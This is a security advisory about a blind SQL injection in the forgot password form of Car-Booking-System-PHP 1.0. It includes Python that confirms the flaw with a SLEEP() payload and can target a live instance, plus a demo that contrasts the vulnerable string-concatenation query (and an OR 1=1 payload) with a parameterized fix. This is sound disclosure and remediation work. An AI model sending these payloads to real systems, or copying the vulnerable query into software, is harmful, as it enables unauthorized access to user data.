Car Booking System PHP SQL Injection Vulnerability in Forgot Password Feature

Vulnerability

A SQL injection vulnerability has been identified in Car-Booking-System-PHP version 1.0 in the forgot password feature. The email address submitted to the forgot password form is placed into a SQL query without parameterization, so anyone who can reach the form (no account is required) can alter the query the database executes. The injection is confirmed as a blind, time-based injection (see Reproduction), so exploitation does not depend on query results appearing in the response. Depending on the privileges of the database account the application uses, the consequences range from reading and modifying stored data to, in some cases, code execution on the server.

Impact

An unauthenticated attacker can execute arbitrary SQL statements with the privileges of the application's database account. In practice that means reading account and booking data, including stored credentials, inserting or altering records, and, where the database account holds file-write or other administrative privileges, escalating to code execution on the host. Because the injection is blind, data is extracted through conditional delays one character at a time, which is slow but fully automatable.

Reproduction

To reproduce this vulnerability, open the forgot password section of the application, submit any email address, and intercept the request with Burp Suite. Send it to Repeater and note the response time of the unmodified request as a baseline. Then append a time-based SQL injection payload to the email parameter (for example, a SLEEP() call inside the injected condition if the backend is MySQL) and resend. If the response is delayed by the requested number of seconds on top of the baseline, the parameter is injectable. Repeat the measurement and vary the requested delay so that a slow network or an overloaded server is not mistaken for a successful injection.
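The timing check described above, written out as an added example; this is not code from the original advisory or from the Car-Booking-System-PHP project. It assumes the form field is named "email", that the value lands inside a single-quoted SQL string literal, that the backend is MySQL (hence SLEEP), and that the tester supplies the endpoint URL. The simulated endpoint at the bottom is constructed so the logic can be exercised offline; against a live instance, pass http_transport(url) instead.

```python
"""Time-based confirmation of the forgot password SQL injection.

Added example; not part of the original advisory or of the
Car-Booking-System-PHP project. Assumptions: field name "email",
value embedded in a single-quoted literal, MySQL backend (SLEEP),
endpoint URL supplied by the tester.
"""
import re
import statistics
import time
import urllib.error
import urllib.parse
import urllib.request
from typing import Callable, Dict

# A transport takes the form fields and returns the response time in seconds.
Transport = Callable[[Dict[str, str]], float]

SLEEP_SECONDS = 5   # delay requested from the database
SAMPLES = 3         # requests per measurement; the median is used
TIMEOUT = 60        # seconds; well above baseline + SLEEP_SECONDS


def build_payload(email: str, delay: int) -> str:
    """Close the string literal, add a delay, comment out the remainder.

    "-- -" is the MySQL comment form that still works if the server
    strips trailing whitespace from the parameter.
    """
    return f"{email}' AND SLEEP({delay})-- -"


def measure(send: Transport, fields: Dict[str, str], samples: int) -> float:
    """Median response time over several requests, to absorb jitter."""
    return statistics.median([send(fields) for _ in range(samples)])


def is_time_based_injectable(send: Transport, email: str,
                             delay: int = SLEEP_SECONDS,
                             samples: int = SAMPLES) -> bool:
    """True if the SLEEP payload delays the response by roughly `delay` s."""
    baseline = measure(send, {"email": email}, samples)
    injected = measure(send, {"email": build_payload(email, delay)}, samples)
    # Demand most of the requested delay on top of the baseline so that an
    # ordinarily slow page is not reported as injectable.
    return injected - baseline >= 0.8 * delay


def http_transport(url: str) -> Transport:
    """Transport that POSTs the form to a live instance (URL is an assumption)."""
    def send(fields: Dict[str, str]) -> float:
        body = urllib.parse.urlencode(fields).encode()
        start = time.monotonic()
        try:
            urllib.request.urlopen(url, data=body, timeout=TIMEOUT).read()
        except OSError:
            # HTTPError, URLError and socket timeouts all derive from OSError;
            # an error page still took measurable time, which is what we want.
            pass
        return time.monotonic() - start
    return send


def simulated_app(vulnerable: bool, base_latency: float = 0.12) -> Transport:
    """Constructed stand-in for the forgot password handler (offline demo).

    It assembles the SQL the way the vulnerable PHP would and then honours
    any SLEEP(n) that landed inside the statement, returning the time the
    request would have taken instead of actually sleeping.
    """
    def send(fields: Dict[str, str]) -> float:
        email = fields["email"]
        if vulnerable:
            sql = f"SELECT id FROM users WHERE email = '{email}'"
        else:
            sql = "SELECT id FROM users WHERE email = ?"  # value bound, never in the text
        match = re.search(r"SLEEP\((\d+)\)", sql, re.IGNORECASE)
        return base_latency + (int(match.group(1)) if match else 0.0)
    return send


if __name__ == "__main__":
    # Offline run against the simulated endpoints. For a live check use
    # http_transport("http://<lab-host>/<forgot-password-page>") instead.
    print("vulnerable build:", is_time_based_injectable(simulated_app(True), "test@example.com"))
    print("patched build:   ", is_time_based_injectable(simulated_app(False), "test@example.com"))
```

The decision compares the median of several samples against a baseline taken moments earlier rather than against a fixed threshold, so a page that is simply slow is not flagged; a second run with a different delay (for instance 10 seconds) gives a further sanity check before you report the finding. Point http_transport only at an instance you are authorized to test.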

Remediation

To mitigate this vulnerability, use prepared statements with bound parameters (PDO or mysqli prepared statements in PHP) for every query that touches user input, so that the submitted email value reaches the database as data rather than as part of the SQL text; this is the actual fix, and escaping or filtering on its own is not a substitute. In addition, validate the submitted value as an email address before querying (filter_var with FILTER_VALIDATE_EMAIL), and run the application under a database account granted only the statements it needs on its own tables, with no FILE or administrative privileges, so that any future injection cannot be escalated to file writes or code execution.
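The vulnerable pattern beside the parameterized fix, as an added example; this is not code from the Car-Booking-System-PHP project, which is written in PHP. The defect class is reproduced here in Python on an in-memory SQLite database so it runs offline; the table layout, column names and sample rows are constructed for the demonstration.

```python
"""Vulnerable forgot password lookup beside the parameterized fix.

Added example, not code from the Car-Booking-System-PHP project. The
users table, its columns and the rows below are constructed sample data.
"""
import re
import sqlite3
from typing import List, Optional, Tuple

Row = Tuple[int, str]

# Loose but useful syntax check; the real protection is parameter binding.
EMAIL_RE = re.compile(r"^[A-Za-z0-9.!#$%&'*+/=?^_`{|}~-]+@[A-Za-z0-9-]+(\.[A-Za-z0-9-]+)+$")


def make_db() -> sqlite3.Connection:
    """Constructed sample data standing in for the application's user table."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, email TEXT NOT NULL, "
        "password_hash TEXT NOT NULL)"
    )
    conn.executemany(
        "INSERT INTO users (email, password_hash) VALUES (?, ?)",
        [("alice@example.com", "hash-a"),
         ("bob@example.com", "hash-b"),
         ("o'brien@example.com", "hash-o")],
    )
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, email: str) -> Optional[List[Row]]:
    """The pattern the advisory describes: input spliced into the SQL text
    (the PHP equivalent is "... WHERE email = '$email'"). Returns None when
    the input breaks the statement, which a legitimate apostrophe does."""
    sql = f"SELECT id, email FROM users WHERE email = '{email}'"
    try:
        return conn.execute(sql).fetchall()
    except sqlite3.OperationalError:
        return None


def lookup_parameterized(conn: sqlite3.Connection, email: str) -> List[Row]:
    """The fix: the value travels to the engine separately from the SQL text,
    so quotes, comment markers and operators inside it are just characters."""
    return conn.execute(
        "SELECT id, email FROM users WHERE email = ?", (email,)
    ).fetchall()


def forgot_password_lookup(conn: sqlite3.Connection, email: str) -> List[Row]:
    """Validation in front of the parameterized query (defense in depth).
    Rejecting malformed input does not make concatenation safe; binding does."""
    if not EMAIL_RE.fullmatch(email):
        return []
    return lookup_parameterized(conn, email)


if __name__ == "__main__":
    db = make_db()
    payload = "nobody@example.com' OR 1=1-- -"
    print("vulnerable:", lookup_vulnerable(db, payload))          # every user
    print("parameterized:", lookup_parameterized(db, payload))    # no user
    print("vulnerable, real apostrophe:", lookup_vulnerable(db, "o'brien@example.com"))  # None
    print("fixed, real apostrophe:", forgot_password_lookup(db, "o'brien@example.com"))
```

The third case is worth noting when arguing for the fix: the concatenating version does not only let an attacker widen the WHERE clause to every account, it also fails for an ordinary address containing an apostrophe, whereas the bound parameter handles both correctly. Least privilege is applied outside the code: the MySQL account the application connects with should be granted only the SELECT, INSERT, UPDATE and DELETE it needs on the application's own database, and never FILE or SUPER.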

Added: Nov 3, 2025, 4:28 PM
Updated: Nov 3, 2025, 7:22 PM

Vulnerability Rating

Custom Algorithm
spread: 0.0
impact: 7.5
exploitability: 8.7
remediation: 0.0
relevance: 0.9
threat: 6.4
urgency: 2.9
incentive: 5.8

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.